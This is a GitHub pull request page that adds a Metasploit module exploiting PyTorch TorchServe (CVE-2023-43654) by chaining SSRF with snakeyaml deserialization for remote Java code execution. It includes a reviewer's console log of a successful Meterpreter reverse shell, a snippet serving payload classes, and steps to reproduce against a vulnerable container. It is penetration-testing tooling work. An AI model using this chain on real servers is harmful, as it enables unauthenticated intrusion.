Add Exploit For CVE-2023-43654 (PyTorch TorchServer SSRF + Deserialization RCE) #18427
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
Thanks for improving the mixin! |
One day, it'll serve a JAR. :) |
jvoisin
reviewed
Oct 5, 2023
jvoisin
reviewed
Oct 6, 2023
zeroSteiner
force-pushed
the
feat/mod/cve-2023-43654
branch
from
9bad7d7
to
2975be6
Compare
jheysel-r7
reviewed
Oct 12, 2023
There was a problem hiding this comment.
Looks good! Just a couple minor comments. After applying the quick fix mentioned below everything worked as expected:
msf6 exploit(multi/http/torchserver_cve_2023_43654) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 0.8.1 is vulnerable.
[*] Using URL: http://172.16.199.1:9090/6I4C04ItE5b1sO/
[*] Registering the model archive...
[+] Sending model archive
[+] Sending ScriptEngineFactory class name
[+] Sending ScriptEngineFactory class name
[*] GET /6I4C04ItE5b1sO/MyScriptEngineFactory.class requested
[+] Sending the constructor class
[*] GET /6I4C04ItE5b1sO/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /6I4C04ItE5b1sO/metasploit.dat requested
[+] Sending 200
[*] GET /6I4C04ItE5b1sO/metasploit.dat requested
[+] Sending the payload configuration data
[*] HEAD /6I4C04ItE5b1sO/metasploit/Payload.class requested
[+] Sending 200
[*] GET /6I4C04ItE5b1sO/metasploit/Payload.class requested
[+] Sending the main payload class
[*] Sending stage (57692 bytes) to 172.16.199.1
[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.1:54068) at 2023-10-11 23:05:41 -0400
[*] Server stopped.
meterpreter > getuid
Server username: model-server
meterpreter > sysinfo
Computer : dc6da9d6fa2a
OS : Linux 6.3.13-linuxkit (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/linux
meterpreter >
documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md
Outdated
Show resolved
Hide resolved
external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
Outdated
Show resolved
Hide resolved
The URIPATH must end with / due to how the package names are requested from the web server in a nested directory structure. #on_request_uri also needed to be updated to check for the relative resource.
This fixes the java/shell_reverse_tcp payload
zeroSteiner
force-pushed
the
feat/mod/cve-2023-43654
branch
from
9fd8149
to
07bdd40
Compare
adfoster-r7
reviewed
Oct 12, 2023
adfoster-r7
reviewed
Oct 12, 2023
| # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp | ||
| when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/ | ||
| vprint_good("Sending additional payload class: #{resource}") | ||
| res = MetasploitPayloads.read("java/#{resource}") |
There was a problem hiding this comment.
Probably worth a quick check that this will work with the at-rest encryption for metasploit-payloads rapid7/metasploit-payloads#679
zeroSteiner
force-pushed
the
feat/mod/cve-2023-43654
branch
from
07bdd40
to
86b7ec4
Compare
|
Thanks for making those changes and for the great module! Retested and everything is working smoothly |
jheysel-r7
added
module
docs
rn-modules
Release NotesThis PR adds a module that exploits PyTorch TorchServer by chaining an SSRF vulnerability with a deserialization RCE vulnerability to permit an unauthenticated remote attacker arbitrary Java code execution. The PR also fixes how the ClassLoader mixin handles datastore options. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
The PyTorch model server contains multiple vulnerabilities that can be chained together to permit an unauthenticated remote attacker arbitrary Java code execution. The first vulnerability is that the management interface is bound to all IP addresses and not just the loop back interface as the documentation suggests. The second vulnerability (CVE-2023-43654) allows attackers with access to the management interface to register MAR model files from arbitrary servers. The third vulnerability is that when an MAR file is loaded, it can contain a YAML configuration file that when deserialized by snakeyaml, can lead to loading an arbitrary Java class.
PyTorch TorchServer versions prior to 0.8.2 are affected. This module was tested against version 0.8.1.
This PR requires the changes from #18355 in order to work against the latest, vulnerable Docker container.
Java::HTTP::ClassLoader
This PR also updates the
ClassLoadermixin to not deregister theURIPATHdatastore option. There are then some additional changes necessary to make it work when a user has set theURIPATHdatastore option. Due to how the class is loaded by Java, theURIPATHmust end in/which is automatically appended if necessary by the mixin.Verification
docker run --rm -it -p 8080:8080 -p 8081:8081 pytorch/torchserve:0.8.1-cpuuse exploit/multi/http/torchserver_cve_2023_43654RHOST,PAYLOADand payload-related optionsrunExample